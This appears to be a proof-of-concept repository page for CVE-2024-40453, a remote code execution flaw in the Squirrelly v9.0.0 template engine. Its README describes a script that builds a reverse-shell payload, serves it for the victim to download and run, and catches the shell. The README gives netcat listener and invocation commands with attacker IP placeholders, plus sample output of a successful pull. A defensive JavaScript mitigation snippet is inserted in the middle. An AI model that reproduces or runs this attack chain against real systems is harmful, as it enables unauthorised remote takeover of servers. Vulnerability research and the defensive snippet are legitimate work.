CVE-2024-40453 PoC — Squirrelly Security Vulnerability

Source
Associated Vulnerability
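Title: Squirrelly Security Vulnerability (CVE-2024-40453)
Description: Squirrelly is a modern, configurable, and blazing-fast template engine implemented in JavaScript, open-sourced by Squirrelly. Squirrelly v9.0.0 contains a security vulnerability: a code injection vulnerability was discovered via the component options.varName.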
Description
CVE-2024-40453 - Squirrelly v9.0.0 RCE. PoC
Readme
# CVE-2024-40453 - Squirrelly v9.0.0 RCE

## Disclaimer:
This script is for educational use only. 

Do not use it for illegal purposes. 

If you do, it’s entirely your responsibility; I am not liable for any misuse.

## Description

This script creates a reverse shell script called `payload.sh` in the current directory.

It then hosts an HTTP server on port 80 for the victim to pull `payload.sh` from.

A listener needs to be started on the attacker's machine.

The HTTP server shuts down after 3 seconds, to allow the victim to pull and execute `payload.sh`.

## EXPLANATION OF EXPLOIT 
Based on the following information, this POC was developed.
https://samuzora.com/posts/cve-2024-40453
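
For defenders, an added example (not part of the original PoC or of Squirrelly itself) of keeping `options.varName` out of reach of request input and flagging requests that try to set it. It assumes an Express-style application in which request parameters are handed to the template render call and can end up in the engine's options; the function names and sample values are hypothetical.

```javascript
'use strict';

// Option name taken from the vulnerability description on this page.
const INJECTABLE_OPTION = 'varName';
// Conservative identifier shape for a varName the application sets itself.
const IDENTIFIER = /^[A-Za-z_$][A-Za-z0-9_$]*$/;

// Copy only allowlisted, primitive-valued keys from untrusted request
// parameters into a prototype-less object for the render call.
function buildTemplateData(untrusted, allowedKeys) {
  const data = Object.create(null);
  const rejected = [];
  for (const [key, value] of Object.entries(untrusted || {})) {
    const primitive = ['string', 'number', 'boolean'].includes(typeof value);
    if (key !== INJECTABLE_OPTION && allowedKeys.includes(key) && primitive) {
      data[key] = value;
    } else {
      rejected.push(key); // worth logging: unexpected or option-shaped input
    }
  }
  return { data, rejected };
}

// Validate a varName that comes from configuration, never from a request.
function isSafeVarName(name) {
  return typeof name === 'string' && IDENTIFIER.test(name);
}

// Detection helper: does a request target carry the option as a parameter,
// including bracketed forms such as varName[x] that query parsers expand?
function requestSetsOption(target) {
  const query = new URL(target, 'http://placeholder.invalid').searchParams;
  for (const key of query.keys()) {
    if (key === INJECTABLE_OPTION || key.startsWith(INJECTABLE_OPTION + '[')) {
      return true;
    }
  }
  return false;
}

// Constructed sample input (not taken from the page).
const sampleQuery = { name: 'alice', varName: 'CONSTRUCTED_VALUE', page: ['1'] };
const { data, rejected } = buildTemplateData(sampleQuery, ['name', 'page']);
console.log(Object.keys(data), rejected);
console.log(requestSetsOption('/?name=alice&varName=CONSTRUCTED_VALUE'));
```

Passing only `data` from `buildTemplateData` to the render call means the template sees the fields it needs while the engine's options stay under the application's control.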

## USAGE
Start your listener
```
rlwrap nc -nvlp 3000
```

Execute the payload
```
# python3 poc.py -rhost <VICTIM_IP> -rport <VICTIM_PORT> -lhost <ATTACKER_IP> -lport <ATTACKER_LISTENER_PORT>

python3 poc.py -rhost 172.16.0.2 -rport 3000 -lhost 172.16.0.1 -lport 3000
[+] Payload created at payload.sh
[*] Hosting HTTP server on port 80
[*] Triggering remote execution
172.16.0.2 - - [13/Jun/2025 22:21:10] "GET /payload.sh HTTP/1.1" 200 -
[*] Shutting down HTTP server on port 80
[!] Check your listener!

```
File Snapshot

[4.0K] /data/pocs/47de78375badf64922caf485f123a456b068a2a3
├── [2.3K] poc.py
└── [1.2K] README.md

0 directories, 2 files